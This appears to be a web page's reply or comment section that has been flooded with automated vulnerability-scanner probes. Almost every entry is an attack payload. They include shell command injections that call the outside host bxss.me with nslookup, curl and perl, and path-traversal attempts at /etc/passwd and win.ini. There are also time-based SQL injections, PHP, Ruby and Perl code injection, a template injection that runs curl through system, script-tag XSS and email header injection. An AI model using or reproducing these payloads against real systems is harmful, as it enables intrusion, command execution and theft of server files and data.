&echo qrzhkd$()\ jfnbki\nz^xyu||a #' &echo qrzhkd$()\ jfnbki\nz^xyu||a #|" &echo qrzhkd$()\ jfnbki\nz^xyu||a #
re: thetokyogourmet
/.././.././.././.././.././.././.././../etc/./passwd%00
re: thetokyogourmet
|echo hmtvfk$()\ bggceo\nz^xyu||a #' |echo hmtvfk$()\ bggceo\nz^xyu||a #|" |echo hmtvfk$()\ bggceo\nz^xyu||a #
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: thetokyogourmet
(nslookup hitxfgomdqpnac2d1f.bxss.me||perl -e "gethostbyname('hitxfgomdqpnac2d1f.bxss.me')")
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
$(nslookup hitkzgmqacaki15ae2.bxss.me||perl -e "gethostbyname('hitkzgmqacaki15ae2.bxss.me')")
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(106).concat(76).concat(106).concat(76)+(require"socket"
Socket.gethostbyname("hitzg"+"lqmkjvfu1408e.bxss.me.")[3].to_s)+"
re: thetokyogourmet
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
&nslookup hitklbcresvcp23945.bxss.me&'\"`0&nslookup hitklbcresvcp23945.bxss.me&`'
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(116).concat(81).concat(104).concat(83)+(require'socket'
Socket.gethostbyname('hityg'+'ilbwlwhi8b966.bxss.me.')[3].to_s)+'
re: thetokyogourmet
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: thetokyogourmet
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: thetokyogourmet
&(nslookup hitildzgdyccy1374f.bxss.me||perl -e "gethostbyname('hitildzgdyccy1374f.bxss.me')")&'\"`0&(nslookup hitildzgdyccy1374f.bxss.me||perl -e "gethostbyname('hitildzgdyccy1374f.bxss.me')")&`'
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: thetokyogourmet
|(nslookup hitiqedxpwxir87163.bxss.me||perl -e "gethostbyname('hitiqedxpwxir87163.bxss.me')")
re: thetokyogourmet
http://bxss.me/t/fit.txt%3F.jpg
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
`(nslookup hitzuaiiovwzsa6bc0.bxss.me||perl -e "gethostbyname('hitzuaiiovwzsa6bc0.bxss.me')")`
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
/\../\../\../\../\../\../\../etc/passwd
re: thetokyogourmet
;(nslookup hituvxwgqcviv3d6b9.bxss.me||perl -e "gethostbyname('hituvxwgqcviv3d6b9.bxss.me')")|(nslookup hituvxwgqcviv3d6b9.bxss.me||perl -e "gethostbyname('hituvxwgqcviv3d6b9.bxss.me')")&(nslookup hituvxwgqcviv3d6b9.bxss.me||perl -e "gethostbyname('hituvxwgqcviv3d6b9.bxss.me')")
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
/WEB-INF/web.xml
re: thetokyogourmet
'"
re: thetokyogourmet
bxss.me
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
C:\WINDOWS\system32\drivers\etc\hosts
re: thetokyogourmet
<!--
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
../../../../../../../../../../windows/win.ini%00.jpg
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
/../../../../../../../../../../boot.ini
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
..\..\..\..\..\..\..\..\windows\win.ini
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: thetokyogourmet
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: thetokyogourmet
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: thetokyogourmet
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: thetokyogourmet
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: thetokyogourmet
WEB-INF/web.xml
re: thetokyogourmet
WEB-INF\web.xml
re: thetokyogourmet
1
re: thetokyogourmet
1
re: thetokyogourmet
-1 OR 2+499-499-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 3+499-499-1=0+0+0+1 --
re: thetokyogourmet
-1 OR 2+125-125-1=0+0+0+1
re: thetokyogourmet
-1 OR 3+125-125-1=0+0+0+1
re: thetokyogourmet
-1' OR 2+660-660-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 3+660-660-1=0+0+0+1 --
re: thetokyogourmet
-1' OR 2+428-428-1=0+0+0+1 or 'h27d7byD'='
re: thetokyogourmet
-1' OR 3+428-428-1=0+0+0+1 or 'h27d7byD'='
re: thetokyogourmet
-1" OR 2+630-630-1=0+0+0+1 --
re: thetokyogourmet
-1" OR 3+630-630-1=0+0+0+1 --
re: thetokyogourmet
if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
1 waitfor delay '0:0:15' --
re: thetokyogourmet
Zk6r41W1'; waitfor delay '0:0:15' --
re: thetokyogourmet
-5 OR 961=(SELECT 961 FROM PG_SLEEP(15))--
re: thetokyogourmet
-5) OR 342=(SELECT 342 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 215=(SELECT 215 FROM PG_SLEEP(15))--
re: thetokyogourmet
i2CEWfZ1' OR 588=(SELECT 588 FROM PG_SLEEP(15))--
re: thetokyogourmet
bzJ0Nm15') OR 199=(SELECT 199 FROM PG_SLEEP(15))--
re: thetokyogourmet
0dVij1B3')) OR 224=(SELECT 224 FROM PG_SLEEP(15))--
re: thetokyogourmet
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
1'"
re: thetokyogourmet
@@8Y6Ra
re: thetokyogourmet
1S8S4DIEM0
re: thetokyogourmet
response.write(9221002*9512203)
re: thetokyogourmet
'+response.write(9221002*9512203)+'
re: thetokyogourmet
"+response.write(9221002*9512203)+"
re: thetokyogourmet
../../../../../../../../../../../../../../etc/passwd
re: thetokyogourmet
<esi:include src="http://bxss.me/rpb.png"/>
re: thetokyogourmet
../../../../../../../../../../../../../../windows/win.ini
re: thetokyogourmet
${9999510+9999446}
re: thetokyogourmet
file:///etc/passwd
re: thetokyogourmet
../
re: thetokyogourmet
)
re: thetokyogourmet
!(()&&!|*|*|
re: thetokyogourmet
^(#$!@#$)(()))******
re: thetokyogourmet
redirtest.acx
re: thetokyogourmet
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: thetokyogourmet
echo kydryt$()\ xxogql\nz^xyu||a #' &echo kydryt$()\ xxogql\nz^xyu||a #|" &echo kydryt$()\ xxogql\nz^xyu||a #
re: thetokyogourmet
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs .jpg
re: thetokyogourmet
'.gethostbyname(lc('hitxj'.'uncbakyl79477.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(90).chr(107).chr(74).'
re: thetokyogourmet
&echo xxcxiu$()\ kokkxi\nz^xyu||a #' &echo xxcxiu$()\ kokkxi\nz^xyu||a #|" &echo xxcxiu$()\ kokkxi\nz^xyu||a #
re: thetokyogourmet
/etc/shells
re: thetokyogourmet
".gethostbyname(lc("hitdz"."dmxrfuzhbcb1b.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(70).chr(122).chr(78)."
re: thetokyogourmet
|echo qzmmsj$()\ gjkwye\nz^xyu||a #' |echo qzmmsj$()\ gjkwye\nz^xyu||a #|" |echo qzmmsj$()\ gjkwye\nz^xyu||a #
re: thetokyogourmet
../../../../../../../../../../../../../../etc/shells
re: thetokyogourmet
gethostbyname(lc('hitwk'.'kaapwnxz817e3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(80).chr(122).chr(90)
re: thetokyogourmet
expr 9000807924 - 959122
re: thetokyogourmet
c:/windows/win.ini
re: thetokyogourmet
(nslookup -q=cname hitumqjhkujmb90ce4.bxss.me||curl hitumqjhkujmb90ce4.bxss.me))
re: thetokyogourmet
bxss.me
re: thetokyogourmet
$(nslookup -q=cname hitelbdswzvhbc9677.bxss.me||curl hitelbdswzvhbc9677.bxss.me)
re: thetokyogourmet
ctime
sleep
p0
(I30
tp1
Rp2
.
re: thetokyogourmet
Http://bxss.me/t/fit.txt
re: thetokyogourmet
&nslookup -q=cname hitgudggxohww9d3fe.bxss.me&'\"`0&nslookup -q=cname hitgudggxohww9d3fe.bxss.me&`'
re: thetokyogourmet
http://bxss.me/t/fit.txt?.jpg
re: thetokyogourmet
&(nslookup -q=cname hitvbjrbqaohc8d228.bxss.me||curl hitvbjrbqaohc8d228.bxss.me)&'\"`0&(nslookup -q=cname hitvbjrbqaohc8d228.bxss.me||curl hitvbjrbqaohc8d228.bxss.me)&`'
re: thetokyogourmet
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: thetokyogourmet
|(nslookup -q=cname hitqgehkvgbzg65adf.bxss.me||curl hitqgehkvgbzg65adf.bxss.me)
re: thetokyogourmet
';print(md5(31337));$a='
re: thetokyogourmet
`(nslookup -q=cname hitnujgvivowf0ff87.bxss.me||curl hitnujgvivowf0ff87.bxss.me)`
re: thetokyogourmet
";print(md5(31337));$a="
re: thetokyogourmet
'"()
re: thetokyogourmet
;(nslookup -q=cname hitlkpccbhybed1a29.bxss.me||curl hitlkpccbhybed1a29.bxss.me)|(nslookup -q=cname hitlkpccbhybed1a29.bxss.me||curl hitlkpccbhybed1a29.bxss.me)&(nslookup -q=cname hitlkpccbhybed1a29.bxss.me||curl hitlkpccbhybed1a29.bxss.me)
re: thetokyogourmet
${@print(md5(31337))}
re: thetokyogourmet
'&&sleep(27*1000)*gcvwio&&'
re: thetokyogourmet
|(nslookup${IFS}-q${IFS}cname${IFS}hitlrazjumgdue6de8.bxss.me||curl${IFS}hitlrazjumgdue6de8.bxss.me)
re: thetokyogourmet
${@print(md5(31337))}\
re: thetokyogourmet
"&&sleep(27*1000)*faigqc&&"
re: thetokyogourmet
&(nslookup${IFS}-q${IFS}cname${IFS}hitifeelpnzag41a88.bxss.me||curl${IFS}hitifeelpnzag41a88.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitifeelpnzag41a88.bxss.me||curl${IFS}hitifeelpnzag41a88.bxss.me)&`'
re: thetokyogourmet
'.print(md5(31337)).'
re: thetokyogourmet
'||sleep(27*1000)*nrochj||'
re: thetokyogourmet
"||sleep(27*1000)*dpjgse||"
re: thetokyogourmet
HttP://bxss.me/t/xss.html?%00
re: thetokyogourmet
bxss.me/t/xss.html?%00
re: thetokyogourmet
"+"A".concat(70-3).concat(22*4).concat(111).concat(69).concat(100).concat(82)+(require"socket"
Socket.gethostbyname("hitcz"+"npxwdsrmc495b.bxss.me.")[3].to_s)+"
re: thetokyogourmet
'+'A'.concat(70-3).concat(22*4).concat(122).concat(81).concat(102).concat(72)+(require'socket'
Socket.gethostbyname('hitix'+'ykkdorkw4aa76.bxss.me.')[3].to_s)+'
re: thetokyogourmet
'A'.concat(70-3).concat(22*4).concat(122).concat(75).concat(106).concat(67)+(require'socket'
Socket.gethostbyname('hitqf'+'wlqxwfiuc8e1a.bxss.me.')[3].to_s)
re: thetokyogourmet
replies
re: thetokyogourmet
'"
re: thetokyogourmet
replies
re: thetokyogourmet
<!--
re: thetokyogourmet
replies/.
re: thetokyogourmet
'"()&%<zzz><ScRiPt >zSRt(9974)</ScRiPt>
re: thetokyogourmet
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitgflsjicroc021f4.bxss.me")}}
re: thetokyogourmet
'"()&%<zzz><ScRiPt >zSRt(9021)</ScRiPt>
re: thetokyogourmet
9214443
re: thetokyogourmet
cxdj1UNN
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
*1
re: thetokyogourmet
-1 OR 5*5=25 --
re: thetokyogourmet
-1 OR 5*5=26 --
re: thetokyogourmet
-1 OR 5*5=25
re: thetokyogourmet
-1 OR 5*5=26
re: thetokyogourmet
*if(now()=sysdate(),sleep(15),0)
re: thetokyogourmet
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: thetokyogourmet
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: thetokyogourmet
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: thetokyogourmet
-1; waitfor delay '0:0:15' --
re: thetokyogourmet
-1); waitfor delay '0:0:15' --
re: thetokyogourmet
-1 waitfor delay '0:0:15' --
re: thetokyogourmet
TkMot6YH'; waitfor delay '0:0:15' --
re: thetokyogourmet
-1 OR 481=(SELECT 481 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1) OR 186=(SELECT 186 FROM PG_SLEEP(15))--
re: thetokyogourmet
-1)) OR 799=(SELECT 799 FROM PG_SLEEP(15))--
re: thetokyogourmet
fuOZX9lQ' OR 348=(SELECT 348 FROM PG_SLEEP(15))--
re: thetokyogourmet
9UyFq0J0') OR 230=(SELECT 230 FROM PG_SLEEP(15))--
re: thetokyogourmet
Dok8OGc1')) OR 232=(SELECT 232 FROM PG_SLEEP(15))--
re: thetokyogourmet
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: thetokyogourmet
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: thetokyogourmet
'||(select 1 from (select pg_sleep(15))x)||'
re: thetokyogourmet
''||(select 1 from (select pg_sleep(15))x)||''
re: thetokyogourmet
'"
re: thetokyogourmet
@@TMWtM
re: thetokyogourmet
(select 198766*667891)
re: thetokyogourmet
(select 198766*667891 from DUAL)
3-chōme-2-13 Motoazabu (https://goo.gl/maps/XCPh8j6qmaa2oVSW8)
re: guest
nirEf1Rr
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
1*
re: guest
-1 OR 2+137-137-1=0+0+0+1
re: guest
-1 OR 3+137-137-1=0+0+0+1
re: guest
if(now()=sysdate(),sleep(15),0)
re: guest
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: guest
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: guest
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: guest
-1; waitfor delay '0:0:15' --
re: guest
-1); waitfor delay '0:0:15' --
re: guest
1 waitfor delay '0:0:15' --
re: guest
GHPPcLNK'; waitfor delay '0:0:15' --
re: guest
-5 OR 604=(SELECT 604 FROM PG_SLEEP(15))--
re: guest
-5) OR 620=(SELECT 620 FROM PG_SLEEP(15))--
re: guest
-1)) OR 628=(SELECT 628 FROM PG_SLEEP(15))--
re: guest
PaMsrgjH' OR 285=(SELECT 285 FROM PG_SLEEP(15))--
re: guest
MuhjuEe4') OR 527=(SELECT 527 FROM PG_SLEEP(15))--
re: guest
JAEP0NSy')) OR 786=(SELECT 786 FROM PG_SLEEP(15))--
re: guest
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: guest
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: guest
'||(select 1 from (select pg_sleep(15))x)||'
re: guest
''||(select 1 from (select pg_sleep(15))x)||''
re: guest
1'"
re: guest
@@tDKVg
re: guest
1XBTDx4O
re: guest
response.write(9815822*9647366)
re: guest
'+response.write(9815822*9647366)+'
re: guest
"+response.write(9815822*9647366)+"
re: guest
%0abcc:074625.67-22022.67.e52fe.19990.2@bxss.me
re: guest
to@example.com>%0d%0abcc:074625.67-22023.67.e52fe.19990.2@bxss.me
re: guest
<esi:include src="http://bxss.me/rpb.png"/>
re: guest
${9999580+9999057}
re: guest
../../../../../../../../../../../../../../etc/passwd
re: guest
../../../../../../../../../../../../../../windows/win.ini
re: guest
file:///etc/passwd
re: guest
../../../../../../../../../../../../../../../proc/version
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: guest
../../../../../../../../../../etc/passwd%00.jpg
re: guest
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: guest
)
re: guest
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: guest
!(()&&!|*|*|
re: guest
'.gethostbyname(lc('hitrj'.'oaoxfvvq693d7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(76).chr(112).chr(80).'
re: guest
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: guest
^(#$!@#$)(()))******
re: guest
echo tcqyor$()\ cpylau\nz^xyu||a #' &echo tcqyor$()\ cpylau\nz^xyu||a #|" &echo tcqyor$()\ cpylau\nz^xyu||a #
re: guest
".gethostbyname(lc("hitaz"."dybtppzq9bee9.bxss.me."))."A".chr(67).chr(hex("58")).chr(114).chr(76).chr(102).chr(75)."
re: guest
/etc/passwd
re: guest
&echo eyvjoi$()\ eqbtvd\nz^xyu||a #' &echo eyvjoi$()\ eqbtvd\nz^xyu||a #|" &echo eyvjoi$()\ eqbtvd\nz^xyu||a #
re: guest
%2fetc%2fpasswd
re: guest
|echo nsjioh$()\ ejezdu\nz^xyu||a #' |echo nsjioh$()\ ejezdu\nz^xyu||a #|" |echo nsjioh$()\ ejezdu\nz^xyu||a #
re: guest
/.././.././.././.././.././.././.././../etc/./passwd%00
re: guest
(nslookup hitybxpukbssn7cab0.bxss.me||perl -e "gethostbyname('hitybxpukbssn7cab0.bxss.me')")
re: guest
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: guest
$(nslookup hitwteqatbmhi93d03.bxss.me||perl -e "gethostbyname('hitwteqatbmhi93d03.bxss.me')")
re: guest
